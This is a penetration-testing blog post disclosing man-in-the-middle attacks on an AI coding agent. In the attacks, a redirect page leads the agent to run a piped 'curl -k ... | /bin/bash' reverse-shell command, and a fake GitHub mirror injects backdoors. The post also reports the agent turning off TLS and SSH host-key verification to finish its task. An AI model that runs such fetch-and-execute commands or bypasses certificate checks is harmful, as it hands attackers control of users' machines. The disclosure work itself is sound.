Cyber Security


Network security meets AI

Man-in-the-middle attacks on AI agents in practice  

Nico Nußer · Updated on: 09.03.2026
Man in the middle attacks on ai agents

In recent years, AI agents have evolved far beyond simple chatbots, becoming increasingly advanced and autonomous. Some organizations now rely on them to autonomously handle tasks or develop software. However, as their capabilities grow, AI agents are also becoming more attractive targets for attackers.

In this blog post we present a previously undocumented attack technique against current AI Agents from a man-in-the-middle position.

Specifically, we demonstrate how an AI Agent performing a harmless task (like aggregating weather information) can be manipulated into opening a reverse shell to our attacker machine, ultimately leading to a full compromise of the victim machine. 

Initial setup: Establishing a man-in-the-middle position against an AI agent

In this proof of concept, we use OpenAI’s Codex as an example of an AI agent. While the demonstration focuses on Codex, other autonomously running AI agents would likely behave in similar ways.

For Codex to operate autonomously (without requiring manual approval for each command) it must run in a permissive configuration. This typically means enabling settings such as Network Access, Full Access, or appending the --yolo flag.  

While these configurations significantly expand the AI Agent’s capabilities, they also increase the potential attack surface. As a result, the risks in this scenario should not be considered equivalent to those in more restrictive or sandboxed deployments.

Obtaining a man-in-the-middle position is possible on almost every network, one could be using  

  • mitm6
  • rouge access points
  • physical wiring
  • ARP spoofing

Furthermore, our attacker machine is configured to forward every traffic to OpenAI servers (so that Codex still works) but redirect every other traffic to a local server displaying the following page: 

MITM client configuration to use local proxy

This works for any website using unencrypted HTTP but not websites using HTTPS. Since we present our own self-signed certificate for any HTTPS connections, the victim browsing the web would constantly see certificate warnings and would probably inform the IT department that something fishy is going on. 

Certificate warning for self-signed certificates

 

But what would an AI agent do? 

Weather2Shell: From weather query to reverse shell execution

So the man-in-the-middle position is established and all requests to websites (except to OpenAI) are redirected to our malicious client configuration page.  
In a real-world scenario, the AI Agent would most likely work on some long running task, sending web requests from time to time to receive new data. To accelerate, we will ask a simple question that would trigger a web request, precisely:

What will the weather in Garching be like in the next week?

Weather2Shell exploit


At the point where the agent executes:

curl -k https://... | /bin/bash

it is basically game over. Our malicious script is executed, and the reverse shell is opened.  To not raise any suspicions and letting the AI Agents perform their tasks, our script also modifies the iptables configuration on our attacker machine to disable the redirection, thereby allowing the victim/coding agent to access external webservers again.

Video: Weather2Shell exploit demonstration

Observe the agent sending requests, executing the malicious payload, and opening a shell connection - highlighting the security implications of task-driven autonomy. 

Video of the Weather2Shell exploit_AI agent


Although the behaviour was partially mitigated - as Codex now uses OpenAI’s web search tool to gather info about weather forecasts, the main issue, namely compromising security in favour of potentially fulfilling a task, still remains.

When using curl, codex still tends to ignore certificate mismatches, even when installing software with elevated permissions. 
 

Video: Ollama installation

What happens if the AI agent installs other software, such as Ollama?

Supply chain compromise via malicious git clone

During our observations of Codex behaviour, we also noticed that during longer tasks the Agent often downloads tools, libraries or dependencies from GitHub. In particular, the git command is also used.  

So what if we present our own GitHub server as the official one? 

To find that out we created a GitHub mirror that locally clones every GitHub repo that is requested by the client but injects a backdoor so that the victim machine is compromised again.

Let’s see how Codex reacts to the presented malicious GitHub server. 

Reaction of codex

While the assumption that the self-signed certificate comes from a man-in-the-middle is completely correct, the conclusion that the usage of GIT_SSL_NO_VERIFY=true should be tried, once again completely compromises the security.

And since the cloned repository is also not checked for modifications, the malicious script is executed or embedded into the project. 

Execution of malicious script

 

Video: Speedtest supply chain compromise via git clone

Watch how the agent fetches libraries and executes injected payloads, showcasing the real-world risks of automated tool and dependency integrations.

SSH man-in-the-middle: Bypassing host key verification

Not only is HTTPS susceptible to this behavior also the Secure Shell Protocol (SSH).

If the victim previously connected to an SSH server, our man-in-the-middle attack again leads to a certificate mismatch: 

Bypassing host key verification

What do you think codex will do in that case? 

  • A: Inform the user about the certificate error and ask them to check it.
  • B: Remove the faulty RSA key with ssh-keygen -f and then connect to the malicious server.

You’ve probably already guessed it. None of them, ssh is run with -o StrictHostKeyChecking=no and -o UserKnownHostsFile=/dev/null.

o-stricthostkeychecking_no_o

That behaviour again enables an attacker to compromise the “meant to be secure” connection and potentially sniff credentials. 

Remote authentication succeeded

Video: SSH man-in-the-middle exploit

See how a supposedly secure channel is compromised, illustrating critical risks in autonomous agent behaviors. 

Conclusions: Security risks of autonomous AI agents

While AI Agents become more and more popular in the corporate world, they also become an increasingly attractive target.  

Giving an AI Agent the permission to execute commands, access the network or process sensitive data, creates a huge risk right now. As current safety guardrails do not sufficiently prevent the compromise of security. Since the AI Agent won’t protect (but might infect) you, it is even more important to implement counter measures such as strict network segmentation, the principle of least privilege and a tiered security model to help prevent or at least make such attacks more difficult. 

Organizations deploying AI agents should reassess their security assumptions before expanding autonomous capabilities. 

If you want to test your security posture (regardless of whether you use AI Agents or not), feel free to reach out to us at https://www.hvs-consulting.de/kontakt

The issue was reported to OpenAI in advance where it was reproduced and confirmed.  

It should be noted that OpenAI is continuing to improve model safety and sandboxing defaults to further reduce risk in untrusted environments.

Thanks also to Bugcrowd for facilitating communication with OpenAI. 

About the author

Nico Nußer

Nico Nußer

Penetration Tester at HvS Consulting

Nico is a member of the Offensive Security team at HvS Consulting. He conducts different types of security assessments for our clients, both on-site and remotely, helping organizations identify vulnerabilities and strengthen their overall security posture.

View LinkedIn profile